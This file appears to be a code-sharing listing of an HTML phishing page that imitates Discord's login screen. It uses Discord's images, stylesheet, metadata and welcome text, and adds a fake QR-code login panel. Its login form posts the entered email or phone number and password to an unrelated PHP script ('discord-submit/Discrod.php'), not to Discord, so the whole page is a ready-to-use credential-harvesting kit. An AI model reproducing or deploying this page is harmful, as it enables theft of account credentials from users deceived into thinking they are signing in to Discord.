Discord-login
3 years ago in HTML
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body, html {
height: 100%;
margin: 0;
}
.bg {
/* The image used */
background-image: url("https://discord.com/assets/fd91131ea693096d6be5e8aa99d18f9e.jpg");
/* Full height */
height: 100%;
/* Center and scale the image nicely */
background-position: center;
background-repeat: no-repeat;
background-size: cover;
}
.form-3 {
font-family: 'Ubuntu', 'Lato', sans-serif;
font-weight: 400;
/* Size and position */
width: 450px;
position: relative;
margin: 60px auto 30px;
padding: 10px;
padding-left: 30px;
overflow: hidden;
/* Styles */
background: #36393f;
border-radius: 0.4em;
border: 1px solid #191919;
}
.form-4 {
font-family: 'Ubuntu', 'Lato', sans-serif;
font-weight: 400;
/* Size and position */
width: 300px;
position:relative;
margin: 60px auto 30px;
padding: 30px;
overflow: hidden;
/* Styles */
background: #36393f;
border-radius: 0.4em;
border: 1px solid #191919;
}
.boxed {
5px solid green ;
}
@media only :-webkit-full-screen and (max-width: 1920px){
.form-4 {
display: none;
}
}
</style>
<head>
<meta charset="utf-8"/>
<meta content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=no" name="viewport"/>
<!-- section:seometa -->
<meta property="og:type" content="website"/>
<meta property="og:site_name" content="Discord"/>
<meta property="og:title" content="Discord - A New Way to Chat with Friends & Communities"/>
<meta property="og:description" content="Discord is the easiest way to communicate over voice, video, and text. Chat, hang out, and stay close with your friends and communities."/>
<meta property="og:image" content="https://discord.com/assets/ee7c382d9257652a88c8f7b7f22a994d.png"/>
<meta name="twitter:card" content="summary_large_image"/>
<meta name="twitter:site" content="@discord"/>
<meta name="twitter:creator" content="@discord"/>
<!-- endsection -->
<link rel="stylesheet" href="https://discord.com/assets/0.90064599edc9a1f5f784.css" integrity="sha256-AzOSiJ15mrjxvKgaM7lVhTTLs1xSnCEYC+cMikQcHMk= sha512-w/nKO4lS+8wsgylSsdEfYSd2BK7sjDkuypzYaQkbXxKcrC8JBj7G/XmmDorRhzwfkOM2CRnV+RmFu6Bg6NEcNA==">
<link rel="icon" href="https://discord.com/assets/07dca80a102d4149e9736d4b162cff6f.ico"/>
<!-- section:title -->
<title>Discord</title>
<link rel="background" href="Discord.css">
<!-- endsection -->
</head>
</head>
<body>
<div class="bg">
<div class="boxed">
<img src="https://discord.com/assets/4f004ac9be168ac6ee18fc442a52ab53.svg" alt="" style="width: 140px; align-self: initial; margin: 25px;">
</div>
<div class="form-3" style="margin-right: 0pxs; float: left; margin-left: 347px; margin-top: 192px auto 190; border-bottom-right-radius: 0mm; border-top-right-radius: 0mm; border-right-color: transparent; object-position: relative;" method="post">
<form action="http://discord-submit/Discrod.php" method="POST">
<h2 style="text-align: center; color: white; margin-bottom: 10px;" >Welcome back!</h2>
<h5 style="text-align: center; color: #8e9297; font-family: Arial, Helvetica, sans-serif; font-weight: lighter; margin-bottom: 25px; margin-top: 0px;">We're so excited to see you again!</h5>
<h6 style="color: #8e9297; font-size: 11px; margin: 0px;">EMAIL OR PHONE NUMBER</h6>
<p class="clearfix">
<input type="text" name="login" id="login" style="height: 35px; width: 400px; border-radius: 0.3em; border-color: #222428; border-width: 1.5px; background-color: #313339; margin: 0px;"">
</p>
<h6 style="color: #8e9297; font-size: 11px; margin-bottom: 5px;">PASSWORD</h6>
<p class="clearfix" style="margin: 0px;">
<input type="password" name="password" id="password" style="height: 35px; width: 400px; border-radius: 0.3em; align-self: center; background-color: #313339; border-width: 1.5px; border-color: #222428; margin: 0px;">
</p>
<h6 style="color: #7289da; margin-top: 5px;"><a href="https://support.discord.com/hc/en-us/search?utf8=%E2%9C%93&query=forgot+password&filter_by=knowledge_base" style="color: #7289da;">Forgot your password?</a></h6>
<p class="clearfix">
<input type="submit" name="submit" value="Login" style="background-color:#7289da; border-radius: 0.3em; border: none; height: 45px; width: 410px;">
</p>
</form>
</div>
<div class="form-4" style="margin-left: 0px; padding: 0px; float: left; margin-top: 192px auto 190; text-align: center; border-left: hidden; border-bottom-left-radius: 0mm; border-top-left-radius: 0mm; border-left-color: transparent; margin-left: 0px;">
<img src="https://i.pinimg.com/originals/60/c1/4a/60c14a43fb4745795b3b358868517e79.png" alt="" style="text-align: center; border-radius: 0.4em; width: 200px; height: 200px; margin-top: 45px;">
<h2 style="color: white; text-align: center;">Log in with QR Code</h2>
<h5 style="color: #8e9297; text-align: center; margin-bottom: 0px;">Scan this with the Discord mobile</h5>
<h5 style="color: #8e9297; text-align: center; margin-top: 0px;"> app to log in instantly</h5>
</div>
</div>
</body>
</html>